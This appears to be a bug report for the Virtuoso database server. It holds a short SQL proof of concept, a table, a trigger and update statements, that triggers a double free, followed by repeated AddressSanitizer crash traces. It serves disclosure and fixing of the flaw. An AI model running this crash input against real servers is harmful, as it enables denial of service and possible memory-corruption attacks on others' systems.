CREATE TABLE v0 ( v1 DECIMAL UNIQUE PRIMARY KEY CHECK ( ( v1 , ( CASE WHEN v2 IS NULL THEN 97 ELSE v1 END ) ) + 255 ) , v2 NVARCHAR ) ;
CREATE TRIGGER v4 BEFORE INSERT ON v0 R FOR EACH ROW INSERT INTO v0 VALUES ( 76 , AS DECIMAL( 39 , 64 ) ) , ( 'x' , 'x' , 49 , 0 , 'x' , 0 x1234567890abcdef ) ;
INSERT INTO v0 VALUES ( 17323404.000000 * 2147483647 + 0 , 80 ) ;
UPDATE v0 SET v1 = 'x' ;
03:35:29 /lib/x86_64-linux-gnu/libasan.so.6(+0x45c0e) [0x7f4dbb83dc0e]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x8710b9) [0x55dd1606a0b9]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x87117d) [0x55dd1606a17d]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x853afa) [0x55dd1604cafa]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a1d2b) [0x55dd15b9ad2b]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a26b2) [0x55dd15b9b6b2]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3ac8eb) [0x55dd15ba58eb]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a329e) [0x55dd15b9c29e]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3b00f5) [0x55dd15ba90f5]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3b3a2d) [0x55dd15baca2d]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3cd253) [0x55dd15bc6253]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3cd458) [0x55dd15bc6458]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3cd9d0) [0x55dd15bc69d0]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x434d84) [0x55dd15c2dd84]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x4351b3) [0x55dd15c2e1b3]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a3fb2) [0x55dd15b9cfb2]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a4439) [0x55dd15b9d439]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a80ff) [0x55dd15ba10ff]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a3fb2) [0x55dd15b9cfb2]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a425f) [0x55dd15b9d25f]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3f9c9c) [0x55dd15bf2c9c]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x28566d) [0x55dd15a7e66d]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a3fb2) [0x55dd15b9cfb2]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3b2736) [0x55dd15bab736]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3bbcdf) [0x55dd15bb4cdf]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3bc22d) [0x55dd15bb522d]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3c2ef3) [0x55dd15bbbef3]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x8736fd) [0x55dd1606c6fd]
03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x88074b) [0x55dd1607974b]
03:35:29 /lib/x86_64-linux-gnu/libc.so.6(+0x94ac3) [0x7f4dbb067ac3]
03:35:29 /lib/x86_64-linux-gnu/libc.so.6(clone+0x44) [0x7f4dbb0f8a74]
03:35:29 GPF: Dkbox.c:784 Double free
GPF: Dkbox.c:784 Double free
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1178000==ERROR: AddressSanitizer: SEGV on unknown address 0xffffffffffffffff (pc 0x55dd1606a24b bp 0x7f4da86c7e70 sp 0x7f4da86c7e50 T6)
==1178000==The signal is caused by a WRITE memory access.
#0 0x55dd1606a24b in gpf_notice /home/virtuoso-opensource/libsrc/Dk/Dkutil.c:88
#1 0x55dd1604caf9 in dk_free_tree /home/virtuoso-opensource/libsrc/Dk/Dkbox.c:784
#2 0x55dd15b9ad2a in ssl_free_data_v /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:190
#3 0x55dd15b9b6b1 in qi_inst_state_free /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:530
#4 0x55dd15ba58ea in qi_free /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:3008
#5 0x55dd15b9c29d in qi_kill /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:763
#6 0x55dd15ba90f4 in qi_handle_reset /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:3980
#7 0x55dd15baca2c in qr_subq_exec /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:4856
#8 0x55dd15bc6252 in trig_call_1 /home/virtuoso-opensource/libsrc/Wi/sqltrig.c:230
#9 0x55dd15bc6457 in trig_call /home/virtuoso-opensource/libsrc/Wi/sqltrig.c:257
#10 0x55dd15bc69cf in trig_wrapper /home/virtuoso-opensource/libsrc/Wi/sqltrig.c:362
#11 0x55dd15c2dd83 in update_node_run /home/virtuoso-opensource/libsrc/Wi/update.c:936
#12 0x55dd15c2e1b2 in update_node_input /home/virtuoso-opensource/libsrc/Wi/update.c:981
#13 0x55dd15b9cfb1 in qn_input /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:982
#14 0x55dd15b9d438 in qn_ts_send_output /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:1059
#15 0x55dd15ba10fe in table_source_input /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:2024
#16 0x55dd15b9cfb1 in qn_input /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:982
#17 0x55dd15b9d25e in qn_send_output /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:1028
#18 0x55dd15bf2c9b in set_ctr_vec_input /home/virtuoso-opensource/libsrc/Wi/sqlvnode.c:642
#19 0x55dd15a7e66c in set_ctr_input /home/virtuoso-opensource/libsrc/Wi/sort.c:1317
#20 0x55dd15b9cfb1 in qn_input /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:982
#21 0x55dd15bab735 in qr_dml_array_exec /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:4637
#22 0x55dd15bb4cde in sf_sql_execute /home/virtuoso-opensource/libsrc/Wi/sqlsrv.c:1991
#23 0x55dd15bb522c in sf_sql_execute_w /home/virtuoso-opensource/libsrc/Wi/sqlsrv.c:2051
#24 0x55dd15bbbef2 in sf_sql_execute_wrapper /home/virtuoso-opensource/libsrc/Wi/sqlsrv.c:3997
#25 0x55dd1606c6fc in future_wrapper /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:1174
#26 0x55dd1607974a in _thread_boot /home/virtuoso-opensource/libsrc/Thread/sched_pthread.c:296
#27 0x7f4dbb067ac2 (/lib/x86_64-linux-gnu/libc.so.6+0x94ac2)
#28 0x7f4dbb0f8a73 in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x125a73)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/virtuoso-opensource/libsrc/Dk/Dkutil.c:88 in gpf_notice
Thread T6 created by T4 here:
#0 0x7f4dbb850685 in __interceptor_pthread_create ../../../../src/libsanitizer/asan/asan_interceptors.cpp:216
#1 0x55dd16079a0e in oplthread_create /home/virtuoso-opensource/libsrc/Thread/sched_pthread.c:425
#2 0x55dd1606ae4b in get_free_thread /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:402
#3 0x55dd1606d854 in schedule_request /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:1654
#4 0x55dd1606ed2d in read_service_request /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:2439
#5 0x55dd1606afe3 in call_default_read /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:498
#6 0x55dd1606b79d in check_inputs_low /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:681
#7 0x55dd1606f8c9 in server_loop /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:2812
#8 0x55dd1607974a in _thread_boot /home/virtuoso-opensource/libsrc/Thread/sched_pthread.c:296
#9 0x7f4dbb067ac2 (/lib/x86_64-linux-gnu/libc.so.6+0x94ac2)
Thread T4 created by T0 here:
#0 0x7f4dbb850685 in __interceptor_pthread_create ../../../../src/libsanitizer/asan/asan_interceptors.cpp:216
#1 0x55dd16079a0e in oplthread_create /home/virtuoso-opensource/libsrc/Thread/sched_pthread.c:425
#2 0x55dd16070458 in PrpcProtocolInitialize /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:3264
#3 0x55dd160704be in PrpcListen /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:3298
#4 0x55dd158e7ee7 in main /home/virtuoso-opensource/binsrc/virtuoso/viunix.c:704
#5 0x7f4dbaffcd8f (/lib/x86_64-linux-gnu/libc.so.6+0x29d8f)
==1178000==ABORTING
Environment:
Ubuntu 22.04, virtuoso v7.2.17 0a2b062 ~ latest version 06e00b6
POC
Error output
03:35:29 /lib/x86_64-linux-gnu/libasan.so.6(+0x45c0e) [0x7f4dbb83dc0e] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x8710b9) [0x55dd1606a0b9] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x87117d) [0x55dd1606a17d] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x853afa) [0x55dd1604cafa] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a1d2b) [0x55dd15b9ad2b] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a26b2) [0x55dd15b9b6b2] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3ac8eb) [0x55dd15ba58eb] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a329e) [0x55dd15b9c29e] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3b00f5) [0x55dd15ba90f5] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3b3a2d) [0x55dd15baca2d] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3cd253) [0x55dd15bc6253] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3cd458) [0x55dd15bc6458] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3cd9d0) [0x55dd15bc69d0] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x434d84) [0x55dd15c2dd84] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x4351b3) [0x55dd15c2e1b3] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a3fb2) [0x55dd15b9cfb2] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a4439) [0x55dd15b9d439] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a80ff) [0x55dd15ba10ff] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a3fb2) [0x55dd15b9cfb2] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a425f) [0x55dd15b9d25f] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3f9c9c) [0x55dd15bf2c9c] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x28566d) [0x55dd15a7e66d] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3a3fb2) [0x55dd15b9cfb2] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3b2736) [0x55dd15bab736] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3bbcdf) [0x55dd15bb4cdf] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3bc22d) [0x55dd15bb522d] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x3c2ef3) [0x55dd15bbbef3] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x8736fd) [0x55dd1606c6fd] 03:35:29 /usr/local/virtuoso-opensource/bin/virtuoso-t(+0x88074b) [0x55dd1607974b] 03:35:29 /lib/x86_64-linux-gnu/libc.so.6(+0x94ac3) [0x7f4dbb067ac3] 03:35:29 /lib/x86_64-linux-gnu/libc.so.6(clone+0x44) [0x7f4dbb0f8a74] 03:35:29 GPF: Dkbox.c:784 Double free GPF: Dkbox.c:784 Double free AddressSanitizer:DEADLYSIGNAL ================================================================= ==1178000==ERROR: AddressSanitizer: SEGV on unknown address 0xffffffffffffffff (pc 0x55dd1606a24b bp 0x7f4da86c7e70 sp 0x7f4da86c7e50 T6) ==1178000==The signal is caused by a WRITE memory access. #0 0x55dd1606a24b in gpf_notice /home/virtuoso-opensource/libsrc/Dk/Dkutil.c:88 #1 0x55dd1604caf9 in dk_free_tree /home/virtuoso-opensource/libsrc/Dk/Dkbox.c:784 #2 0x55dd15b9ad2a in ssl_free_data_v /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:190 #3 0x55dd15b9b6b1 in qi_inst_state_free /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:530 #4 0x55dd15ba58ea in qi_free /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:3008 #5 0x55dd15b9c29d in qi_kill /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:763 #6 0x55dd15ba90f4 in qi_handle_reset /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:3980 #7 0x55dd15baca2c in qr_subq_exec /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:4856 #8 0x55dd15bc6252 in trig_call_1 /home/virtuoso-opensource/libsrc/Wi/sqltrig.c:230 #9 0x55dd15bc6457 in trig_call /home/virtuoso-opensource/libsrc/Wi/sqltrig.c:257 #10 0x55dd15bc69cf in trig_wrapper /home/virtuoso-opensource/libsrc/Wi/sqltrig.c:362 #11 0x55dd15c2dd83 in update_node_run /home/virtuoso-opensource/libsrc/Wi/update.c:936 #12 0x55dd15c2e1b2 in update_node_input /home/virtuoso-opensource/libsrc/Wi/update.c:981 #13 0x55dd15b9cfb1 in qn_input /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:982 #14 0x55dd15b9d438 in qn_ts_send_output /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:1059 #15 0x55dd15ba10fe in table_source_input /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:2024 #16 0x55dd15b9cfb1 in qn_input /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:982 #17 0x55dd15b9d25e in qn_send_output /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:1028 #18 0x55dd15bf2c9b in set_ctr_vec_input /home/virtuoso-opensource/libsrc/Wi/sqlvnode.c:642 #19 0x55dd15a7e66c in set_ctr_input /home/virtuoso-opensource/libsrc/Wi/sort.c:1317 #20 0x55dd15b9cfb1 in qn_input /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:982 #21 0x55dd15bab735 in qr_dml_array_exec /home/virtuoso-opensource/libsrc/Wi/sqlrun.c:4637 #22 0x55dd15bb4cde in sf_sql_execute /home/virtuoso-opensource/libsrc/Wi/sqlsrv.c:1991 #23 0x55dd15bb522c in sf_sql_execute_w /home/virtuoso-opensource/libsrc/Wi/sqlsrv.c:2051 #24 0x55dd15bbbef2 in sf_sql_execute_wrapper /home/virtuoso-opensource/libsrc/Wi/sqlsrv.c:3997 #25 0x55dd1606c6fc in future_wrapper /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:1174 #26 0x55dd1607974a in _thread_boot /home/virtuoso-opensource/libsrc/Thread/sched_pthread.c:296 #27 0x7f4dbb067ac2 (/lib/x86_64-linux-gnu/libc.so.6+0x94ac2) #28 0x7f4dbb0f8a73 in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x125a73) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/virtuoso-opensource/libsrc/Dk/Dkutil.c:88 in gpf_notice Thread T6 created by T4 here: #0 0x7f4dbb850685 in __interceptor_pthread_create ../../../../src/libsanitizer/asan/asan_interceptors.cpp:216 #1 0x55dd16079a0e in oplthread_create /home/virtuoso-opensource/libsrc/Thread/sched_pthread.c:425 #2 0x55dd1606ae4b in get_free_thread /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:402 #3 0x55dd1606d854 in schedule_request /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:1654 #4 0x55dd1606ed2d in read_service_request /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:2439 #5 0x55dd1606afe3 in call_default_read /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:498 #6 0x55dd1606b79d in check_inputs_low /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:681 #7 0x55dd1606f8c9 in server_loop /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:2812 #8 0x55dd1607974a in _thread_boot /home/virtuoso-opensource/libsrc/Thread/sched_pthread.c:296 #9 0x7f4dbb067ac2 (/lib/x86_64-linux-gnu/libc.so.6+0x94ac2) Thread T4 created by T0 here: #0 0x7f4dbb850685 in __interceptor_pthread_create ../../../../src/libsanitizer/asan/asan_interceptors.cpp:216 #1 0x55dd16079a0e in oplthread_create /home/virtuoso-opensource/libsrc/Thread/sched_pthread.c:425 #2 0x55dd16070458 in PrpcProtocolInitialize /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:3264 #3 0x55dd160704be in PrpcListen /home/virtuoso-opensource/libsrc/Dk/Dkernel.c:3298 #4 0x55dd158e7ee7 in main /home/virtuoso-opensource/binsrc/virtuoso/viunix.c:704 #5 0x7f4dbaffcd8f (/lib/x86_64-linux-gnu/libc.so.6+0x29d8f) ==1178000==ABORTING